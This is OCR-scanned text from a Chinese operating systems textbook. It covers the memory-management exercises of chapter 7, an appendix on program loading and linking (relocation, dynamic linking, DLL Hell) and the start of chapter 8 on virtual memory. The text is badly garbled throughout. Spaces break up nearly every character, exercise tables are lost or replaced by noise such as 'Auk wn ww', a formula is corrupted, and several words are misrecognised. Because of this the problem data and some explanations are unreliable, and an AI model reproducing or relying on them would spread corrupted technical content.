2.3 节 中 列 出 了 内 存 管理 的 5 个 目标 ，7.1 节 中 列 出 了 5 种 需求 。 请 说 明 它 们 是 一 致 的 。 

假设 一 个 多 道 程序 系统 采用 固定 分 区 的 内 存 管 理 策略 ， 分 区 的 大 小 分 别 为 Part0=20K, Partl=30K, 

Part2=30K， 和 Part3=50K。 同 时 假设 下 表 中 的 进程 需要 调度 进 内 存 。 假 定 这 些 进 程 都 是 (KEL) 按 

照 它们 的 进程 号 的 顺序 在 同一 时 刻 (时间 0 ) 到 达 的 。 表 格 中 的 时 间 一 栏 表 示 这 个 进程 需要 分 配 一 个 

分 区 来 完成 的 时 间 ， 包 含 了 完成 该 进程 的 全 部 时 间 ( 例如 ， 交 换 时 间 ，CPU 时 间 等 等 。) 假设 一 个 进 

程 一 旦 被 分 配 内 存 ， 该 进程 会 一 直 驻 留 在 内 存 中 直到 它 完 成 为 止 (没有 交换 发 生 )。 

a) 如 果 每 一 个 进程 都 被 分 配 最 小 的 分 区 ， 且 能 够 满足 它 的 需求 ( 在 某 些 教材 中 被 称 为 最 佳 适应 分 配 
策略 )， 那 么 系统 需要 多 长 时 间 执 行 完 表 中 所 有 进程 。 解 释 你 的 答案 。 

b) 如 果 每 一 个 进程 都 被 分 配 最 小 的 空闲 分 区 ， 且 能 够 满足 它 的 需求 (在 某 些 教材 中 被 称 为 最 佳 可 得 
分 配 策略 )， 那 么 系统 需要 多 长 时 间 执 行 完 表 中 全 部 的 进程 。 解 释 你 的 答案 。 


进 程 最 大 内 存 需求 (K) 时间 (ms) 
18 10 


Auk wn 
ww 
w 
= 
tn 


49 10 


说 明 下 面 每 一 种 内 存 分 配方 案 平 均 情 况 下 的 内 部 碎片 的 大 小 。 回 答 尽 可 能 详细 。 

a) 动态 分 区 

b) 简单 分 页 

c) 伙伴 系统 | 

为 实现 动态 分 区 中 的 各 种 放置 算法 ( 见 7.2 节 )， 内 存 中 必须 保留 一 个 空闲 块 列表 。 分 别 讨论 最 佳 适 
配 、 首 次 适 配 、 下 次 适 配 三 种 方法 的 平均 查找 长 度 。 

动态 分 区 的 另 一 种 放置 算法 是 最 差 适 配 , 在 这 种 情况 下 , 当 调 人 一 个 进程 时 , 使 用 最 大 的 空闲 存储 块 。 
该 方法 与 最 佳 适 配 、 首 次 适 配 、 下 次 适 配 相 比 ， 优 点 和 缺点 各 是 什么 ? 它 的 平均 查找 长 度 是 多 少 ? 
如 果 使 用 动态 分 区 方案 ， 下 图 所 示 为 在 某 个 给 定 的 时 间 点 的 内 存 结构 : 





a 2 2 22 3 2 22 2 


阴影 部 分 为 已 经 被 分 配 的 块 ! 空白 部 分 为 空闲 块 。 接 下 来 的 三 个 内 存 需 求 分 别 为 40MB, 20MB 
和 10MB。 分 别 使 用 如 下 几 种 放置 算法 ， 指 出 给 这 三 个 需求 分 配 的 块 的 起 始 地 址 。 


7.7 


7.8 


7.12 


7.13 


a) 首次 适 配 

b) 最 佳 适 配 

c) 下 次 适 配 ( 假定 最 近 添 加 的 块 位 于 内 存 的 开始 ) 

d) 最 差 适 配 

假设 你 的 计算 机 操作 系统 使 用 伙伴 系统 来 进行 内 存 管理 。 初 始 化 的 时 候 系统 有 1 兆 (1024KB ) 内 存 


块 是 空闲 的 ， 这 些 内 存 块 起 始 地 址 为 0。 参 考 图 7.6 中 的 表达 方式 ， 利 用 一 组 数字 来 说 明 每 一 次 内 存 
申请 和 释放 之 后 的 结果 。 


A: 申请 25KB E: 申请 30KB 
B: 申请 500KB 释放 A 
C: 申请 60KB F: 申请 20KB 


D: 申请 100KB 
在 给 进程 分 配 内 存 之 后 ， 系 统 中 存在 多 少 个 内 部 碎片 ? 
考虑 一 个 伙伴 系统 ， 在 当前 分 配 下 的 一 个 特定 块 地 址 为 011011110000。 
a) 如 果 块 大 小 为 4， 它 的 伙伴 的 二 进 制 地 址 为 多 少 ? 
b) 如 果 块 大 小 为 16， 它 的 伙伴 的 二 进 制 地 址 为 多 少 ? 
$ buddy: (x) 为 大 小 为 2、 地 址 为 x 的 块 的 伙伴 的 地 址 ， 写 出 buddy, (x) 的 通用 表达 式 。 
Fibonacci 序列 定义 如 下 : 
Fo=0, F\=1, Fa 一 Fri+F，， n20 
a) 这 个 序列 可 以 用 于 建立 伙伴 系统 吗 ? 
b) 该 伙伴 系统 与 本 章 介绍 的 二 叉 伙 伴 系统 相 比 ， 有 什么 优点 ? 
在 程序 执行 期 间 ， 每 次 取 指 令 后 处 理 器 把 指令 寄存 器 的 内 容 (程序 计数 器 ) 增加 一 个 字 ， 但 如 果 遇 
到 会 导致 在 程序 中 其 他 地 址 继续 执行 的 跳 转 或 调用 指令 ， 处 理 器 将 修改 这 个 寄存 器 的 内 容 。 现 在 考 
虑 图 7.8， 关 于 指令 地 址 有 两 种 选择 
@ 在 指令 寄存 器 中 保存 相对 地 址 ， 并 把 指令 寄存 器 作为 输入 进行 动态 地 址 转换 。 当 遇 到 一 次 成 功 的 
跳 转 或 调用 时 ， 由 这 个 跳 转 或 调用 产生 的 相对 地 址 被 装 人 到 指令 寄存 器 中 。 
© 在 指令 寄存 器 中 保存 绝对 地 址 。 当 遇 到 一 次 成 功 的 跳 转 或 调用 时 ， 采 用 动态 地 址 转换 ， 其 结果 保 
存在 指令 寄存 器 中 。 
哪 种 方法 更 好 ? 
在 一 个 32 位 的 机 器 上 , 假设 把 逻辑 地 址 分 为 8 位 6 位 6 位 12 位 四 个 部 分 。 换 名 话说， 系统 使 用 3 
级 页 表 ， 其 中 第 一 个 8 位 是 第 一 级 ， 后 面 的 6 位 是 第 二 级 ， 以 此 类 推 。 在 这 个 系统 中 ， 用 6 位 表示 
页 号 。 假 设 内 存 是 按照 字 节 访问 的 。 
a) 该 系统 中 页 的 大 小 是 多 少 ? 
b) 能 够 分 配给 一 个 进程 的 最 多 的 页 面 个 数 是 多 少 ? 
c) 逻辑 地 址 空间 最 大 是 多 少 ? 
d) 物理 内 存 的 大 小 ? 
分 页 系统 中 的 虚拟 地 址 a 相当 于 一 个 (p,，w) 对 ， 其 中 p 是 页 号 ，w 是 在 页 中 的 字 节 号 。 令 z 是 一 
页 中 的 字 节 总 数 ， 请 给 出 p 和 w 关 于 z 和 a 的 函数 。 
在 一 个 简单 分 段 系统 中 ， 包 含 如 下 段 表 : 


起 始 地 址 KE CFT) 
660 248 
1752 442 
222 198 
996 604 


对 如 下 的 每 一 个 逻辑 地 址 ， 确 定 其 对 应 的 物理 地 址 或 者 说 明 段 错误 是 否 会 发 生 : 
a) 0, 198 
b) 2, 156 
c) 1, 530 
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d) 3, 444 > 
e) 0, 222 
715 在 内 存 中 ， 存 在 连续 的 段 Si S82, 一 ia 如 下 图 所 示 





24 Bb Sm OEN, RE Si, S, ， 中 的 革 些 肌 可 能 已 经 被 测 除 ， BE Sm 仍 被 立即 放置 在 
段 S* 之 后 。 当 自 (正在 使 用 或 已 被 删除 ) 和 洞 之 间 的 边界 到 达 内 存 的 另 一 端 时 , 压缩 正在 使 用 的 段 。 
a) 说 明 花 费 在 压缩 上 的 时 间 己 遵 循 以 下 不 等 式 : 

1-f t 
“> 好 ; 其 中 lee 

HEt, s 表示 段 的 平均 长 度 (UFASH); 

1 表示 段 的 平均 生命 周期 ， 即 内 存 访 问 次 数 ; 

/表示 在 平衡 条 件 下 ， 未 使 用 的 内 存 部 分 的 比例 。 
Bm: 计算 边界 在 内 存 中 移动 的 平均 速度 ， 并 假设 复制 一 个 字 至 少 需 要 两 次 内 存 访问 。 
b) 24 f=0.2, t= 1000, s=S50N, HH F. 


附录 7A ”加载 和 链接 


创建 活动 进程 的 第 一 步 是 把 程序 装 入 内 存 ， 并 创建 一 个 进程 映像 ( 如 图 7.15 所 示 )。 图 7.16 描述 了 大 
多 数 系统 中 的 一 种 典型 场景 。 应 用 程序 由 许多 已 编译 过 的 或 汇编 过 的 模块 组 成 ,这些 模块 以 目标 代码 的 形 
式 存在 ， 并 被 链接 起 来 以 解析 模块 间 的 任何 访问 和 对 库 例 程 的 访问 。 库 例 程 可 以 被 合并 到 程序 中 ， 或 作为 
操作 系统 在 运行 时 提供 的 共享 代码 被 访问 。 这 个 附录 将 着 重 总 结 链接 咒 和 加 载 器 的 主要 特征 。 为 了 表达 得 
更 清楚 ， 首 先 描述 只 涉及 一 个 程序 模块 时 的 加 载 任务 ， 这 时 不 需要 链接 。 


加 载 
在 图 7.16 中 ,加 载 器 把 加 载 的 模块 放置 在 内 存 中 从 x 开始 的 位 置 。 在 加 载 这 个 程序 的 过 程 中 ,必须 满 
足 图 7.1 中 所 描述 的 寻 址 需求 。 一 般 而 言 ， 可 以 采用 三 种 方法 : 绝对 加 载 、 可 重 定位 加 载 、 动 态 运行 时 加 载 。 


绝对 加 载 

绝对 加 载 器 要 求 一 个 给 定 的 加 载 模块 总 是 被 加 载 到 内 存 中 的 同一 个 位 置 。 因 此 ， 在 提供 给 加 载 器 的 加 
载 模块 中 ， 所 有 的 地 址 访问 必须 是 确定 的 ， 或 者 说 是 绝对 的 内 存 地 址 。 例 如 ， 如 果 图 7.16 中 的 x 是 1024 
位 置 ， 则 加 载 模块 中 的 第 一 个 字 在 内 存 中 的 地 址 为 1024。 





内 存 中 的 进程 也 人 
图 7.15 加载 的 功能 


给 程序 中 的 内 存 访问 指定 具体 的 地 址 值 既 可 以 由 程序 员 完 成 ， 也 可 以 在 编译 时 或 者 汇编 时 完成 ， 见 表 
7.3a。 这 种 方法 存在 许多 缺点 : 首先， 程序 员 必须 知道 在 内 存 中 放置 模块 时 预定 的 分 配 策略 。 其 次 ， 如 果 
在 程序 的 模块 体 中 进行 了 任何 涉及 插入 或 删除 的 修改 ， 则 所 有 地 址 都 需要 更 改 。 因 此 ， 更 可 取 的 方法 是 允 
许 用 符号 表示 程序 中 的 内 存 访问 ,然后 在 编译 或 者 汇编 时 解析 这 些 符 号 引用 ， 如 图 7.17 所 示 。 对 指令 或 数 
据 项 的 引用 最 初 被 表示 成 一 个 符号 。 在 准备 输入 到 一 个 绝对 加 载 器 的 模块 时 ， 汇 编 器 或 编译 器 将 把 所 有 这 
些 引 用 转换 成 具体 地 址 。 在 图 7.17b 的 例子 中 ,模块 被 加 载 到 从 1024 位 置 开始 的 位 置 。 


可 重 定 位 加 载 
在 加 载 之 前 就 把 内 存 访问 绑 定 到 具体 的 地 址 的 缺点 是 ， 这 会 使 得 加 载 模 沁 只 能 放置 到 内 存 中 的 一 个 区 
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域 。 但 是 ， 当 多 个 程序 共享 内 存 时 ， 不 可 能 事先 确定 哪 块 区 域 用 于 加 载 哪 个 特定 的 模块 ， 最 好 是 在 加 载 时 
确定 。 因 此 ， 人 需要 一 个 可 以 被 分 配 到 内 存 中 任何 地 方 的 加 载 模块 。 ' 

为 满足 这 个 新 需求 ,汇编 器 或 编译 器 不 产生 实际 的 内 存 地 址 ( 绝对 地 址 ), 而 是 相对 于 某 些 已 知 点 的 地 
址 ,如 相对 于 程序 的 起 点 , 这 个 技术 如 图 7.17c 所 示 。 加 载 模块 的 起 点 被 指定 为 相对 地 址 0, 模块 中 的 所 有 
其 他 内 存 访问 都 用 与 该 模块 起 点 的 相对 值 来 表示 。 





图 7.16 ”连接 和 加 载 场景 
相对 地 址 
0 














400 





1200 1200+x 


a) 目标 模块 b ) 绝对 加 载 模块 c) 相对 加 载 模块 d) 相对 加 载 模块 从 x 位 置 
开始 加 载 到 内 存 中 


图 7.17 ”绝对 和 可 重 定 位 加 载 模块 


经 然 所 有 内 存 访问 都 以 相对 的 形式 表示 ， 加 载 器 就 可 以 很 容易 地 把 模块 放置 在 期 望 的 位 置 。 如 果 该 模 
块 要 加 载 到 从 x 位 置 开始 的 地 方 ， 则 当 加 载 器 把 该 模块 加 载 到 内 存 中 时 ， 只 需要 简单 地 给 每 个 内 存 访问 都 
ME xo 为 完成 这 个 任务 ， 加 载 模块 必须 包含 一 些 需要 告诉 加 载 器 的 信息 ， 如 地 址 访问 在 哪里 、 它 们 如 何 
被 解释 (通常 相对 于 程序 的 起 点 , 但 也 可 能 相对 于 程序 中 的 某 些 其 他 点 ， 如 当前 位 置 )。 由 编译 器 或 汇编 器 
准备 这 些 信 息 ， 通 常 称 这 些 信息 为 重 定 位 地 址 库 。 


动态 运行 时 加 载 

可 重 定位 加 载 器 是 非常 普遍 的 ， 并 且 相 对 于 绝对 加 载 器 具有 明显 的 优点 。 但 是 ， 在 多 道 程序 设计 环境 
中 ， 即 使 不 依赖 于 虚拟 内 存 ， 可 重 定位 的 加 载 方案 仍 是 不 够 的 。 由 于 需要 把 进程 换 人 或 换 出 内 存 ， 以 增 大 
处 理 器 的 利用 率 。 为 最 大 程度 地 利用 内 存 ， 又 希望 能 在 不 同 的 时 刻 把 一 个 进程 映像 换 回 到 不 同 的 位 置 。 这 
样 程 序 被 加 载 后 ， 可 能 被 换 出 到 磁盘 ， 然 后 又 被 换 回 到 内 存 中 不 同 的 位 置 。 如 果 在 开始 加 载 的 时 候 ， 内 存 
访问 就 被 绑 定 到 绝对 地 址 ， 那 么 前 面 提 到 的 情况 将 是 不 可 能 实现 的 。 . 

一 种 替代 的 方案 是 在 运行 时 真正 在 使 用 某 个 绝对 地 址 时 再 计算 它 。 为 达到 这 个 目的 ， 加 载 模块 被 加 载 
到 内 存 中 时 ， 它 的 所 有 内 存 访问 都 以 相对 形式 表示 ， 如 图 7.17c 所 示 ， 一 条 指令 只 有 在 真正 被 执行 时 才 计 
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算 绝 对 地 址 。 为 确保 该 功能 不 会 降低 性 能 , 这 些 工作 必须 由 特殊 的 处 理 器 硬件 完成 , 而 不 是 用 软件 实现 ( 见 
7.2 节 )。 

动态 地 址 计算 提供 了 完全 的 灵活 性 。 一 个 程序 可 以 加 载 到 内 存 中 的 任何 区 域 ， 程 序 的 执行 可 以 中 断 ， 
程序 还 可 以 被 换 出 内 存 ， 以 后 再 换 回 到 不 同 的 位 置 。 
链接 

链接 器 的 功能 是 把 一 组 目标 模块 作为 输入 ， 产 生 一 个 包含 完整 的 程序 和 数据 模块 的 加 载 模块 ， 传 递 给 
加 载 器 。 在 每 个 目标 模块 中 ， 可 能 有 到 其 他 模块 的 地 址 访问 ， 每 个 这 样 的 访问 可 以 在 未 链接 的 目标 模块 中 
用 符号 表示 。 链 接 器 会 创建 一 个 单独 的 加 载 模块 ， 它 把 所 有 目标 模 一 个 接 一 个 地 链接 起 来 。 每 个 模块 内 的 
引用 必须 从 符号 地 址 转换 成 对 整个 加 载 模块 中 的 一 个 位 置 的 引用 。 例 如 图 7.18a 中 的 模块 A 包含 对 模块 B 
的 一 个 过 程 调用 。 当 这 些 模块 都 组 合 到 加 载 模块 中 时 ， 这 个 到 模块 B 的 符号 引用 就 变 成 了 对 加 载 模块 中 B 
的 人 口 点 位 置 的 一 个 确切 的 引用 。 


表 7.3 BEM 
am 载 器 
功 能 
程序 员 直 接 在 程序 中 确定 所 有 实际 的 物理 地 址 
程序 包含 符号 地 址 访问 ,由 编译 器 或 汇编 器 把 它们 转换 成 实际 的 物理 地 址 



























编译 或 汇编 时 




















mam 编译 器 或 汇编 器 产生 相对 地 址 ， 加 载 吕 在 加 载 程序 中 把 它们 转换 成 实际 的 绝对 地 址 
运行 时 被 加 载 的 程序 保持 相对 地 址 ， 处 理 器 硬件 把 它们 在 执行 时 动态 地 转换 成 绝对 地 址 
b) 链 接 器 
链接 时 间 功 能 
程序 设计 时 不 允许 外 部 程序 或 数据 访问 。 程 序 员 必须 把 所 有 引用 到 的 子 程序 的 源 代码 放 人 程序 中 
编译 或 汇编 时 汇编 器 必须 取 到 每 个 引用 到 的 子 程序 的 源 代码 ， 并 把 它们 作为 一 个 部 件 来 进行 汇编 
所 有 目标 模 艾 都 使 用 相对 地 址 汇编 。 这 些 模块 被 链接 在 一 起 ， 所 有 的 访问 都 相对 于 最 
加 载 模块 产生 时 后 加 载 的 模块 的 地 点 重新 声明 
本 直到 加 载 模 奖 被 加 载 到 内 存 时 才 解 析 外 部 访问 ， 此 时 被 访问 的 动态 链接 模 决 附加 到 加 
载 槛 鼎 后 ， 整 个 软件 包 被 加 载 到 内 存 或 虚拟 内 存 
运行 时 直到 处 理 器 执行 外 部 调用 时 才 解 析 外 部 访问 ， 此 时 该 进程 被 中 断 ， 需 要 的 模块 被 链接 
到 调用 程序 中 
链接 编辑 程序 


地 址 链接 的 性 质 取决 于 链接 发 生 时 要 创建 的 加 载 模块 的 类 型 ， 见 表 7.3b。 通 常情 况 下 需要 可 重 定位 的 
加 载 模块 ， 然 后 链接 按 以 下 方式 完成 。 每 个 已 编译 过 或 汇编 过 的 目标 模块 连同 相对 于 该 目标 模块 开始 处 的 
引用 一 同 被 创建 。 所 有 这 些 模 块 ， 连 同 相 对 于 该 加 载 模块 起 点 的 所 有 引用 ， 一 起 放 进 一 个 可 重 定位 的 加 载 
模块 中 。 该 模块 可 以 作为 可 重 定位 加 载 或 动态 运行 时 加 载 的 输入 。 

产生 可 重 定位 加 载 模块 的 链接 器 通常 称 做 链接 编辑 程序 。 图 7.18 说 明了 链接 编辑 程序 的 功能 。 

像 加 载 一 样 ， 可 能 推迟 某 些 链接 功能 。 动 态 链接 (dynamic linking ) 是 指 把 某 些 外 部 模块 的 链接 推迟 到 
创建 加 载 模块 之 后 。 因 此 ， 加 载 模块 包含 到 其 他 程序 的 未 解析 的 引用 ， 这 些 引 用 可 以 在 加 载 时 或 运行 时 被 
解析 。 

对 于 加 载 时 的 动态 链接 ( 包括 图 7.16 中 上 面 的 动态 库 )， 分 为 如 下 步骤 。 将 被 加 载 的 加 载 模块 〈 应 用 
BR) 读 人 内 存 。 应 用 模块 中 到 一 个 外 部 模块 〈 目标 模块 ) 的 任何 引用 都 导致 加 载 程 序 查找 目标 模块 ， 加 
载 它 ， 并 把 这 些 引用 修改 成 相对 于 应 用 程序 模块 开始 处 的 相对 地 址 。 该 方法 比 静 态 链 接 有 以 下 优点 : 

@ 能 够 更 容易 地 并 人 已 改变 或 已 升级 了 的 目标 模块 ， 如 操作 系统 工具 ， 或 者 某 些 其 他 的 通用 例 程 。 

而 对 于 静态 链接 ， 这 类 支持 模块 的 变化 将 需要 重新 链接 全 部 应 用 程序 模块 。 除 了 静态 链接 比较 低 
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效 以 外 ， 在 某 些 情况 下 甚至 不 可 能 使 用 静态 链接 。 例 如 ， 在 个 人 计算 机 领域 ， 大 多 数 商 用 软件 以 
加 载 模块 的 形式 发 布 ， 而 不 会 公布 源 程序 和 目标 程序 。 

@ 在 动态 链接 文件 中 的 目标 代码 为 自动 代码 共享 铺 平 了 道路 。 因 为 操作 系统 加 载 并 链接 了 该 代码 ， 
所 以 可 以 识别 出 有 多 个 应 用 程序 使 用 相同 的 目标 代码 。 操 作 系统 可 以 使 用 此 信息 ， 然 后 只 加 载 目 
标 代码 的 一 个 副本 ， 并 把 这 个 被 加 载 的 目标 副本 链接 到 所 有 使 用 该 目标 代码 的 应 用 程序 ， 而 不 是 
为 每 个 应 用 程序 都 分 别 加 载 一 个 副本 。 

o 它 使 得 独立 软件 开发 人 员 可 以 更 容易 地 扩展 诸如 Linux 之 类 的 广泛 使 用 的 操作 系统 的 功能 。 开 发 人 
员 可 以 设计 出 一 个 对 各 种 应 用 程序 都 很 有 由 的 新 功能 ， 并 把 它 包 装 成 一 个 动态 链接 模块 。 

使 用 运行 时 动态 链接 时 ( 包括 图 7.16 中 下 面 的 动态 库 )， 某 些 链接 工作 规 推 迟到 执行 时 。 这样 一 些 对 
目标 模块 的 外 部 引用 保留 在 被 加 载 的 程序 中 ， 当 调用 的 模块 不 存在 时 ， 操 作 系统 定位 该 模块 ， 加 载 它 ， 并 
把 它 链接 到 调用 模块 中 ， 这 些 模 块 一 般 是 共享 的 。 在 Windows 环境 下 ， 这 些 模块 叫做 动态 链接 库 (DLL). 
也 就 是 说 ， 如 果 一 个 进程 已 经 使 用 了 动态 链接 共享 模块 ， 该 模块 就 位 于 内 存 中 ， 新 的 进程 就 可 以 简单 地 链 
接 上 已 经 加 载 好 的 模块 了 。 






对 模块 B 的 上 


外 部 引用 BEL 0 



































长 度 M 
L+M-1 
L+M 
KEEN L+M+N-1 
a) 目标 模块 b) 加 载 功能 
图 7.18 ”链接 功能 


使 用 DLL 可 能 会 导致 一 个 问题 ， 一 般 称 之 为 DLL 地 狱 (DLL Hell )。 两 个 或 更 多 的 进程 共享 一 个 
DLL 模块 ,但 是 它们 希望 链接 不 同 版 本 的 模块 时 ， SSeS ee tent 
统 功能 可 能 会 重新 安装 ， 因 而 带 入 一 个 老 的 DLL 版 本 文件 。 

.虽然 动态 加 载 允 许 一 个 完整 的 加 载 模 块 到 处 移动 ， 但 是 该 模块 的 结构 是 静态 的 ， 在 进程 执行 期 间 以 及 
从 一 次 执行 到 下 一 次 执行 都 保持 不 变 。 在 某 些 情况 下 ， 不 可 能 在 执行 前 确定 筑 要 器 个 目标 模块 ， 事 务 处 理 
应 用 程序 就 是 这 类 情况 的 典型 代表 ， 如 航空 公司 预订 系统 或 银行 业 应 用 程序 。 需 要 根据 事务 的 性 质 指定 需 
要 哪个 程序 模块 ， 然 后 加 载 它 并 链接 到 主 程序 。 使 用 动态 链接 器 的 优点 是 在 程序 单元 被 引用 之 前 ， 不 需要 
为 它们 分 配 内 存 空间 ， 这 种 能 力 可 用 于 支持 分 段 系 统 。 

还 有 另外 一 种 改进 : 应 用 程序 不 需要 知道 可 能 会 调用 的 所 有 模块 名 或 人 口 点 。 例 如 ， 制 表 程序 可 能 会 
和 各 种 绘图 仪 一 起 工作 ， 每 个 绘图 仪 都 由 不 同 的 驱动 软件 包 驱 动 ， 应 用 程序 可 以 从 另 一 个 进程 中 得 知 或 者 
从 配置 文件 中 查找 到 绘图 仪 的 和 名字， 这 种 改进 允许 应 用 程序 的 用 户 安装 一 个 在 编写 该 程序 时 并 不 存在 的 新 
绘图 仪 。 





第 8 章 虚拟 内 存 


第 7 章 介绍 了 分 页 和 分 段 的 概念 ， 并 分 析 了 它们 各 自 的 缺点 。 我 们 从 本 章 开 始 讨论 虚拟 内 
存 。 由 于 内 存 管理 同 处 理 器 硬件 和 操作 系统 软件 都 有 着 紧密 而 复杂 的 关系 , 所 以 关于 这 方面 的 
分 析 是 非常 复杂 的 。 本 章 首先 重点 讲述 虚拟 内 存 的 硬件 特征 ,考虑 使 用 分 页 、 分 段 和 段 页 式 这 
三 种 情况 ， 然 后 考虑 操作 系统 中 虚拟 内 存 设 施 的 设计 问题 。 

表 8.1 给 出 了 一 些 虚拟 内 存 相关 的 定义 。 


表 8.1 虚拟 内 存 术 语 


在 存储 分 配 机 制 中 , 尽管 备用 内 存 是 主 内 存 的 一 部 分 , 它 也 可 以 被 寻 址 。 程序 引用 内 
存 使 用 的 地 址 与 内 存 系统 用 于 识别 物理 存储 站 点 的 地 址 是 不 同 的 ,程序 生成 的 地 址 会 自 
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限制 ， 而 不 受 内 存储 位 置 实 际 数量 的 限制 

虚拟 地 址 在 虚拟 内 存 中 分 配给 某 一 位 置 的 地 址 使 该 位 置 可 以 被 访问 ,仿佛 它 是 主 内 存 的 一 部 分 

虚拟 地 址 空间 分 配给 进程 的 虚拟 存储 

地 址 空间 可 用 于 某 进 程 的 内 存 地 址 范围 

实地 址 内 存 中 存储 位 置 的 地 址 


8.1 硬件 和 控制 结构 


通过 对 简单 分 页 、 简 单 分 段 与 固定 分 区 、 动 态 分 区 等 方式 进行 比较 , 一 方面 可 以 了 解 二 者 的 
区 别 , 另 一 方面 可 以 看 到 在 内 存 管理 方面 具有 根本 突破 的 基础 所 在 。 分 页 和 分 段 的 两 个 特点 是 取 
得 这 种 突破 的 关键 : 
1) 进程 中 的 所 有 存储 器 访问 都 是 逻辑 地 址 ， 这 些 逻 辑 地 址 在 运行 时 动态 地 被 转换 成 物理 地 
址 。 这 意味 着 一 个 进程 可 以 被 换 人 或 换 出 内 存 ， 使 得 进程 可 以 在 执行 过 程 中 的 不 同时 刻 
占据 内 存 中 的 不 同 区 域 。 
2 ) 一 个 进程 可 以 划分 成 许多 块 ( 页 和 段 ), 在 执行 过 程 中 , 这 些 块 不 需要 连续 地 位 于 内 存 中 。 
动态 运行 时 地 址 转换 和 页 表 或 眉 表 的 使 用 使 这 一 点 成 为 可 能 。 
如 果 具 备 前 面 的 两 个 特点 ， 那 么 在 进程 的 执行 过 程 中 ， 该 进程 不 需要 所 有 页 或 所 有 段 都 
在 内 存 中 。 如 果 内 存 中 保存 着 要 取 的 下 一 条 指令 的 所 在 块 ( 段 或 页 ) 以 及 将 要 访问 的 下 

一 个 数据 单元 的 所 在 块 ， 那 么 执行 至 少 可 以 暂时 继续 下 去 。 
现在 考虑 如 何 实现 这 一 点 。 用 术语 “ 块 ”来 表示 页 或 段 ， 取 决 于 是 采用 分 页 还 是 分 段 机 制 。 
假设 需要 把 一 个 新 进程 放 人 内 存 时 , 操作 系统 仅 读 取 包含 程序 开始 处 的 一 个 或 几 个 块 。 进程 执行 
中 的 任何 时 候 都 在 内 存 中 的 部 分 被 定义 成 进程 的 常 驻 集 (resident set )。 当 进程 执行 时 ， 只 要 所 有 
的 存储 器 访问 都 是 要 访问 常 驻 集中 的 单元 , 执行 就 可 以 顺利 进行 ; 通过 使 用 段 表 或 页 表 , AE 
总 是 可 以 确定 是 否 如 此 。 如 果 处 理 器 需要 访问 一 个 不 在 内 存 中 的 逻辑 地 址 , 则 产生 一 个 中 断 , 说 
明 产 生 了 内 存 访问 故障 。 操 作 系 统 把 被 中 断 的 进程 置 于 阻塞 状态 , 并 取得 控制 。 为 了 能 继续 执行 
这 个 进程 ， 操作 系 统 要 把 包含 引发 访问 故障 的 逻辑 地 址 的 进程 块 取 进 内 存 。 为 此 , 操作 系统 产生 
一 个 磁盘 IO 读 请 求 。 产 生 LO 请 求 后 ， 在 执行 磁盘 IO 期 间 ， 操 作 系 统 可 以 调度 另 一 个 进程 运 
行 。 一 旦 需要 的 块 被 取 进 内 存 , 则 产生 一 个 WO 中 断 ， 控 制 被 交 回 操作 系统 ， 而 操作 系统 把 由 于 


F8EË BMAF 233 


缺少 该 块 而 被 阻塞 的 进程 置 回 就 绪 态 。 

进程 在 执行 过 程 中 仅仅 因为 没有 装 入 所 有 需要 的 进程 块 而 不 得 不 被 中 断 ,这 种 方法 的 效率 问 
题 很 让 人 怀疑 。 现在 暂且 不 考虑 保证 效率 的 问题 , 而 先 考虑 新 策略 的 实现 问题 。 有 两 种 实现 方法 
可 以 提高 系统 的 利用 率 ， 其 中 第 二 种 的 效果 比 第 一 种 更 令 人 吃惊 。 这 两 种 实现 方法 分 别 是 : 

1 ) 在 内 存 中 保留 多 个 进程 。 由 于 对 任何 特定 的 进程 都 仅仅 装 人 它 的 某 些 块 ， 因 此 就 有 足够 
的 空间 来 放置 更 多 的 进程 。 这 样 , 在 任何 时 刻 这 些 进程 中 都 能 至 少 有 一 个 处 于 就 绪 状态 , 于 是 处 
理 器 得 到 了 更 有 效 的 利用 。 

2 ) 进程 可 以 比 内 存 的 全 部 空间 还 大 。 程 序 占用 的 内 存 空间 的 大 小 是 程序 设计 中 最 大 的 限制 
之 一 。 如 果 没 有 这 种 方案 ， 程 序 员 必须 清楚 地 知道 有 多 少 内 存 空 间 可 用 。 如 果 编 写 的 程序 太 大 ， 
程序 员 就 必须 设计 出 能 把 程序 分 成 块 的 方法 , 这 些 块 可 以 按 某 种 覆盖 策略 分 别 加 载 。 通 过 基于 分 
页 或 分 段 的 虚拟 内 存 , 这 项 工作 可 以 由 操作 系统 和 硬件 完成 。 对 程序 员 而 言 ,他 所 处 理 的 是 一 个 
巨大 的 内 存 ， 大 小 与 磁盘 存储 器 相关 。 操 作 系 统 在 需要 时 ， 自 动 把 进程 块 装 人 内 存 。 

由 于 一 个 进程 只 能 在 内 存 中 执行 , 因此 这 个 存储 器 称 做 实 存储 器 (real memory), 简称 实 存 。 
但 是 程序 员 或 用 户 感觉 到 的 是 一 个 更 大 的 内 存 , 通 常 它 被 分 配 在 磁盘 上 , 这 称 为 虚拟 内 存 ( virtual 
memory), 简称 虚 存 。 虚 存 允 许 更 有 效 的 多 道 程序 设计 ， 并 解除 了 用 户 与 内 存 之 间 没 有 必要 的 紧 
BAR, R 8.2 总 结 了 使 用 虚 存 和 不 使 用 虚 存 的 情况 下 分 页 和 分 段 的 特点 。 


表 8.2 分 页 和 分 段 的 特点 


简单 分 页 RERA 
闪存 被 划分 成 大 小 加 | 内存 被 划分 成 大 小 国 
定 的 小 块 ， 称 做 页 框 | 定 的 小 块 ， 称 做 页 杠 内 存 未 被 划分 内 存 未 被 划分 
程序 被 编译 器 或 内 存 | ”程序 被 编译 器 或 内 存 | ”由 程序 册 给 编译 句 指 定 程序 | ”由 程序 员 纵 编译 器 指定 答 
管理 系统 划分 成 页 管理 系统 划分 成 页 段 (也 就 是 说 , 由 程序 员 决定 ) | 序 段 ( 也 就 是 由 程序 员 决定 ) 






页 框 中 有 内 部 碎片 没有 内 部 碎片 

没有 外 部 碎片 有 外 部 碎片 

操作 系统 必须 为 每 个 | ”操作 系统 必须 为 每 个 | ”操作 系统 必须 为 每 个 进程 | ”操作 系统 必须 为 每 个 进 各 
进程 维护 一 个 页 表 , 以 说 | 进程 维护 一 个 页 表 ,以 说 维护 一 个 段 表 ， 以 说 明 每 一 
明 每 个 页 对 应 的 页 框 。 ”| 明 每 个 页 对 应 的 页 框 | 中 的 加 载 地 址 和 长 度 段 中 的 加 载 地 址 和 长 度 

操作 系统 必须 维护 一 | 操作 系统 必须 维护 -| ”操作 系统 必须 维护 一 个 内 | ”操作 系统 必须 维护 一 个 内 
个 空闲 页 框 列表 个 空闲 页 框 列表 存 中 的 空闲 的 空洞 列表 存 中 的 空闲 的 空洞 列表 


